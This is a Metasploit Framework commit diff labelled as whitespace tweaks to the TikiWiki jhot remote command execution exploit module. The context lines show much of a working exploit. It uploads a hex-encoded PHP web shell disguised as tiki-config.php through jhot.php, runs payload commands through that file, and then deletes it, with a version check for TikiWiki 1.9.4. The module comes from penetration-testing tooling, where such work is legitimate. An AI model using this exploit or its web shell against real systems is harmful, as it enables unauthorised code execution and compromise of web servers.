minor whitespace tweaks

git-svn-id: file:///home/svn/framework3/trunk@9108 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb

@@ -1,3 +1,7 @@
+##
+# $Id$
+##
+
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -17,11 +21,12 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Name'           => 'TikiWiki jhot Remote Command Execution',
 			'Description'    => %q{
 					TikiWiki contains a flaw that may allow a malicious user to execute
-					arbitrary PHP code. The issue is triggered due to the jhot.php script
+				arbitrary PHP code. The issue is triggered due to the jhot.php script
-					not correctly verifying uploaded files. It is possible that the flaw
+				not correctly verifying uploaded files. It is possible that the flaw
-					may allow arbitrary PHP code execution by uploading a malicious PHP
+				may allow arbitrary PHP code execution by uploading a malicious PHP
-					script resulting in a loss of integrity.
+				script resulting in a loss of integrity.
-					The vulnerability has been reported in Tikiwiki version 1.9.4.
+
+				The vulnerability was reported in Tikiwiki version 1.9.4.
 			},
 			'Author'         => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
 			'License'        => MSF_LICENSE,
@@ -43,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
 							'PayloadType' => 'cmd',
 							'RequiredCmd' => 'generic perl ruby bash telnet',
 						}
-				},		
+				},
 			'Platform'       => 'unix',
 			'Arch'           => ARCH_CMD,
 			'Targets'        => [[ 'Automatic', { }]],
@@ -67,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			}
 		}, 25)
 
-		if (res and res.message == "OK" and res.body.match(/TikiWiki 1.9.4/))
+		if (res and res.message == "OK" and res.body.match(/TikiWiki 1\.9\.4/))
 			return Exploit::CheckCode::Vulnerable
 		end
 
@@ -78,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		create_temp_file()
 
 		command = payload.encoded
-	
+
 		exe_command(command)
 
 		remove_temp_file()
@@ -130,7 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			"\x52\x55\x55\x46\x39\x44\x54\x45\x6c\x46\x54\x6c\x52\x66\x53\x56" +
 			"\x41\x69\x58\x53\x6b\x37\x22\x29\x29\x3b\x0d\x0a\x3f\x3e\x0d\x0a"
 
-		data = 
+		data =
 			"-----------------------------7d529a1d23092a\r\n" +
 			"Content-Disposition: form-data; name=\"filepath\"; filename=\"tiki-config.php\";\r\n\r\n" +
 			scode +
@@ -140,7 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		res = send_request_cgi({
 			'uri'     => url_jhot,
 			'method'  => 'POST',
-			'data'    => "#{data}",
+			'data'    => data,
 			'headers' =>
 				{
 					'User-Agent'   => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
@@ -148,14 +153,14 @@ class Metasploit3 < Msf::Exploit::Remote
 					'Connection'   => 'Close',
 				}
 		}, 25)
-	
+
 		if (res and res.message == "OK")
 			print_status("Successfully created temporary file.")
 		else
 			print_status("Error creating temporary file.")
 		end
 	end
-	
+
 	def exe_command(cmd)
 		url_config = datastore['URI'] + "/img/wiki/tiki-config.php"
 
@@ -169,7 +174,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				'Connection' => 'Close',
 			}
 		}, 25)
-		
+
 		if (res and res.message == "OK" and res.body.match(/my_delim/m))
 			print_status("The server returned            : #{res.code} #{res.message} (#{res.headers['Server']})")
 
@@ -185,7 +190,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			print_status("No response from the server")
 		end
 	end
-	
+
 	def remove_temp_file
 		url_config = datastore['URI'] + "/img/wiki/tiki-config.php"
 
@@ -199,7 +204,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				'Connection' => 'Close',
 			}
 		}, 25)
-	
+
 		if (res and res.message == "OK")
 			print_status("Successfully remove temporary file.")
 		else